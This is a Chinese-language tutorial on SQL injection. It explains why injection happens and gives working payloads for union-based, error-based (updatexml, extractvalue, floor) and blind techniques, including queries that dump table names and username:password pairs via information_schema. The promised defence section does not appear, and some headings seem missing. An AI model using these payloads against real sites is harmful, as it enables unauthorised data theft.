SQL注入漏洞原理与防御深度剖析

SQL注入（SQL Injection）是Web安全中最古老且最具破坏性的漏洞之一。本文将深入剖析SQL注入的底层原理，并详细讲解联合查询注入、报错注入及盲注三大核心手法。

一、SQL注入的底层成因

SQL注入的本质是**“用户输入未严格过滤，被当作代码拼接到SQL语句中执行”**。
当用户输入通过前端表单提交至后端接口时，若后端直接将参数拼接到SQL查询中，攻击者便可通过构造恶意SQL语句（如闭合单引号、添加逻辑判断），使数据库执行非预期的查询，从而获取敏感数据甚至控制服务器。

适用于页面存在回显位的场景。

判断列数： 利用 order by 子句进行排序测试，递增数字直至报错，确定当前查询的列数。
?id=1' order by 3 --+
定位回显位： 使用 union select 拼接查询。将原查询条件设为不存在的值（如 id=-1），使页面回显来自 union 后的自定义查询结果。
?id=-1' union select 1,2,3 --+
获取系统信息： 在回显位中调用 database()、version()、user() 等系统函数。
?id=-1' union select 1,database(),version() --+
利用 Information_schema 库脱库：
- 查表名： union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
- 查列名： union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
- 查数据： union select 1,group_concat(username,':',password),3 from users

适用于页面无数据回显，但会返回数据库报错信息的场景。通过利用数据库函数执行时的报错机制，将查询结果嵌入到错误信息中带出。

Updatexml() 函数： 利用 XPath 格式错误强制报错。
?id=-1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) --+
（0x7e为 ~ 的十六进制，由于 ~ 不是有效的 XPath 路径起始符，MySQL 会在报错信息中显示拼接出的字符串）
Extractvalue() 函数： 原理与 updatexml 类似。
and extractvalue(1, concat(0x7e, (select user()), 0x7e))
Floor() 函数： 利用 floor() 配合 rand() 和 count() 产生的重复键值错误来获取数据，构造相对复杂。

提示：报错注入通常有长度限制（如32位），且一次只能显示一行，常需配合 limit 0,1 逐行读取。

适用于页面既无数据回显，也无错误信息的场景。

通过构造逻辑表达式，观察页面返回状态（如是否显示特定关键词）来判断真假。

利用 sleep() 函数配合 if() 条件判断。若条件为真，则执行延时，以此推断数据内容。